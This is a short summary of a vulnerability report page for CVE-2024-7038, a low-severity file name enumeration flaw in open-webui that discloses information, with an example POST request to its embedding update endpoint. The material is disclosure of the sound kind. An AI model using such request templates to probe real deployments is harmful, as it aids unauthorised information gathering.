The following key information about the vulnerability can be obtained from this web page screenshot:

1. Vulnerability description:
   - Title: File Name enumeration leads to information disclosure in open-webui/open-webui
   - Report date: July 12, 2024
   - Status: Verified

2. Vulnerability type:
   - CVE ID: CVE-2024-7038
   - Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

3. Vulnerability severity:
   - Level: Low (2.7)

4. Exploitation:
   - Request example:

```
POST /rag/api/v1/embedding/update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US, en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:8080/admin/settings/
Content-Type: application/json
Authorization: Bearer <JWT>
```